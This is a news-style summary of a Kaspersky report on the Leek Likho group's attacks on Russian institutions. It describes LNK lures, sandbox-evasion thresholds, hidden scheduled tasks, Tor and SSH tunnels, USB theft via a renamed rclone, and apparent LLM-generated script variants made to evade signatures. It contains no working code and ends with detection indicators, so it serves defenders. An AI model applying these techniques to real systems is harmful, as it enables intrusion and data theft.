AI-Generated Cyberattacks: How Leek Likho Uses LLMs and Legitimate Tools to Hack Russian Targets

The threat actor known as Leek Likho has persisted in its targeted offensives against Russian entities, predominantly focusing on state institutions, while aggressively diversifying its malicious toolkit across disparate objectives. Security researchers at Kaspersky posit that the group may be leveraging Large Language Models (LLMs) to dynamically synthesize programmatic script variations, file naming conventions, and operational metadata. Notwithstanding these adaptations, the foundational compromise framework remains unchanged: a victim is enticed with an archive masquerading as an official PDF document, which, upon execution, deploys a sophisticated sequence of PowerShell, Tor, OpenSSH, and rclone.

In a comprehensive treatise covering activities observed in 2026, Kaspersky dissected Leek Likho’s evolving methodology, a novel file exfiltration vector, and indications of AI-assisted asset generation. The collective—variously tracked by the monikers SkyCloak and Vortex Werewolf—initially gained prominence in 2025 following a string of targeted incursions against public sector organizations in Russia and Belarus, a campaign designated Operation SkyCloak. Between February and April 2026, analysts observed a continuation of this offensive lineage, accompanied by a refined data harvesting technique.

Leek Likho’s operational efficacy relies upon a potent convergence of social engineering, multi-stage delivery chains, and the weaponization of legitimate utilities. While the adversaries perpetually alter their command infrastructure, programming scripts, file nomenclatures, and obfuscation heuristics, the overarching mechanics of the intrusion remain static: the victim is manipulated into extracting an archive, a PowerShell script subsequently establishes persistent remote access components, an encrypted communication conduit is erected via Tor and SSH, and data is systematically exfiltrated utilizing rclone.

Initial ingress is predominantly orchestrated through Telegram. Victims receive a deceptive hyperlink mimicking a legitimate file download page within the messaging platform; alternatively, the attackers occasionally exploit Dropbox. Traversing this link precipitates the download of a compressed ZIP archive containing a contextual lure.

The core deception exploits a disparity in how file compression utilities render archives. The native Windows interface displays an object that convincingly mirrors a conventional PDF document—such as an administrative decree or a training directive. However, when inspected via a utility such as 7-Zip, the authentic file extension is revealed as .pdf.lnk. A representative artifact cited in the report is titled Proekt_prikaza_681_o_pooshchrenii.pdf.lnk. The shortcut file is explicitly configured to inherit a PDF icon from Microsoft Edge, ensuring visual plausibility during superficial examination.

Nestled within the primary archive is a concealed directory containing a secondary compressed container. This repository houses an array of utility binaries disguised as ubiquitous applications. For instance, datagrip.exe functions as a repackaged Tor client, while messenger.exe cloaks an OpenSSH component; ancillary files orchestrate local SSH and SFTP connections. These appellations are meticulously selected to mirror routine software dependencies, thereby minimizing suspicion when nestled within the user’s localized AppData folder.

Upon activation, the LNK file initializes the premier phase of infection, dubbed LeekSower. The payload invokes PowerShell, isolates the original ZIP container within the user profile, extracts its contents into AppData, isolates the nested archive, and executes the subsequent programmatic routine, known as LeekGerminator.

LeekGerminator initially executes a rigid environmental diagnostic evaluation. To authorize further execution, the system’s recent documents directory must contain upwards of ten LNK files, and the operating system must concurrently host more than fifty active processes. Should these thresholds fail to materialize, the infection sequence terminates immediately. This defensive countermeasure enables the malicious architecture to evade automated sandbox analysis and virtualized security environments.

Provided the host passes these environmental validations, LeekGerminator renders the decoy PDF to assuage user suspicion, purges transient forensic footprints, and instantiates a mutex to preclude overlapping executions. Subsequently, the script registers two obscured tasks within the Windows Task Scheduler: the first initializes the renamed OpenSSH server, while the second establishes a Tor instance under the guise of datagrip.exe. Both operations are invoked via conhost in a detached state, completely devoid of user-facing windows.

Telemetry with the command infrastructure is routed exclusively through Tor and SSH. Tor utilizes secure bridges and the obfs4 transport protocol, which obfuscates traffic signatures to severely complicate detection at the network layer. The OpenSSH server is bound strictly to the loopback address 127.0.0.1 and mandates cryptographic key authentication rather than passwords. This architecture affords the adversaries a secure, encrypted pathway to the infected node without exposing services directly to the public internet.

Following the initiation of the Tor service, the script dispatches an outbound query to an encrypted .onion destination belonging to the command center. This transmission conveys the local username, the unique hidden Tor service identifier, and a specific version string of the malware file. The curl command executes up to 1,000 connection attempts, punctuated by three-second intervals, ensuring a resilient connection even amidst erratic network connectivity.

The novel exfiltration methodology highlighted in the treatise revolves around a module designated LeekYield. Once a secure terminal session is achieved, the operator deploys an instance of rclone, renamed as bittorrent.exe, and schedules a task containing an encoded PowerShell directive. The script actively polls for the insertion of USB storage media, clones the targeted data into a transient directory, and chronologically segregates files by their modification metadata, prioritizing contemporary documentation. The extraction routine allocates a strict maximum of three minutes per storage device.

The harvested file repositories are subsequently transmitted via rclone utilizing the S3 protocol to an external repository hosted at aunion. This transmission occurs over local port 12191 via a pre-established cryptographic tunnel. Fundamentally, the aggressors forgo the development of a proprietary exfiltration tool, opting instead to embed a legitimate, highly reliable cloud storage management utility into their malicious chain.

A separate section of the report delineates the industrialization of the group’s malware manufacturing. For every distinct target, Leek Likho prepares bespoke iterations of lures and system components. LNK files feature altered administrative document indices, the binaries within the secondary container receive unique names mimicking localized software, and the underpinning scripts feature randomized variables, functional strings, and task identifiers.

Investigators observed that identical programmatic actions across separate builds were executed through divergent coding techniques, with superfluous instructions occasionally introduced without altering the ultimate functional outcome. Crucially, the foundational infection topology remained uniform. Kaspersky analysts conclude that these stylistic anomalies strongly point to the deployment of Large Language Models to automate the generation of script variations and naming patterns.

This automated paradigm allows Leek Likho to systematically circumvent static signature-based security controls and complicates forensic file identification. Nonetheless, the systemic behavioral markers of the assault remain highly conspicuous: the invocation of PowerShell from an LNK file, the instantiation of concealed scheduled tasks, the execution of an unverified Tor binary, communication with .onion network nodes, localized SSH access, and automated data synchronization via rclone. Kaspersky emphasizes that such indicators can be effectively neutralized and identified through robust EDR implementation and meticulous network traffic analysis.